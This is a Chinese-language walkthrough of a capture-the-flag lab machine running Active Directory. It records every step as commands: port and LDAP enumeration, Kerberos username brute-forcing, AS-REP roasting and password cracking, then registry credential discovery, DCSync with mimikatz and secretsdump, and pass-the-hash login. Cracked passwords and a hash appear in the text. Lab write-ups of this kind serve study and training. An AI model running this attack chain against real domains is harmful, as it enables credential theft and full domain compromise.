端口扫描
sudo nmap -p- -n --open -v 10.10.10.175
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49695/tcp open unknown
49716/tcp open unknown
web端口搜集到几个用户名,按描述。其中有一人是管理员
Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver
网站应该是纯静态的html站点,联系和评论表单都是假的。
rpcclient -U "" -N 10.10.10.175
rpc匿名访问,但没权限执行命令
smbclient --no-pass -L //10.10.10.175
SMB1 disabled -- no workgroup available
smb匿名登录成功,但是没有共享管道
nmap -n -sV --script "ldap* and not brute" 10.10.10.175
得到域名应该是EGOTISTICAL-BANK.LOCAL
尝试把上面获得的姓名,姓名各一行组成字典进行asreproast.但一个都没有。
陷入僵局,看wp是爆破用户名。。。。我获取域用户的思路还是没错
使用kerbrute爆破
./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 /home/wuerror/Documents/SecLists-2021.3.1/Usernames/xato-net-10-million-usernames.txt
没等它跑完,已经跑出的fsmith用户asreproast成功
impacket-GetNPUsers -no-pass -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith
john爆破得到密码Thestrokes23
john --wordlist=/usr/share/wordlists/rockyou.txt fsmith.txt
john --show fsmith.txt
evil-winrm -u fsmith -p Thestrokes23 -i 10.10.10.175
可获取到user.txt
net user
Administrator FSmith Guest HSmith krbtgt svc_loanmgr
查看c:\users目录发现还有一个svc_loanmgr用户目录,看来重点是他
继续检查,systeninfo无权限,whoami /priv的也无法利用。上传自动检查脚本PrivescCheck
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck
发现svc_loanmgr用户的密码
Moneymakestheworldgoround!
手动查看可以执行:
reg.exe query "HKLM\software\microsoft\windows nt\currentversion\winlogon"
上传mimikatz:
.\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit
或者impacket,这个的输出格式就很方便使用另外的脚本
impacket-secretsdump -just-dc svc_loanmgr@10.10.10.175
把中间的lmhash:ntlmhash这段复制出来
(psexec,evil-winrm都行)
impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -dc-ip 10.10.10.175 administrator@10.10.10.175
对比两图可以明显的看到mimikatz和secretdump两个拿到的ntlm hash是一样的。lm hash不同
但是使用wmiexec登录时,把前面的lmhash 换成mimikatz拿到的lm hash 0一样可以登录
我不是很懂这个到底怎么回事
2.该如何检查哪个用户拥有域复制权限呢?但从所属用户组来看,fsmith和svc_loanmgr没有区别.
下面是hacktrick的检测方法,但执行结果看不出是哪个用户
Get-ObjectAcl -DistinguishedName "DC=EGOTISTICAL-BANK,DC=LOCAL" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。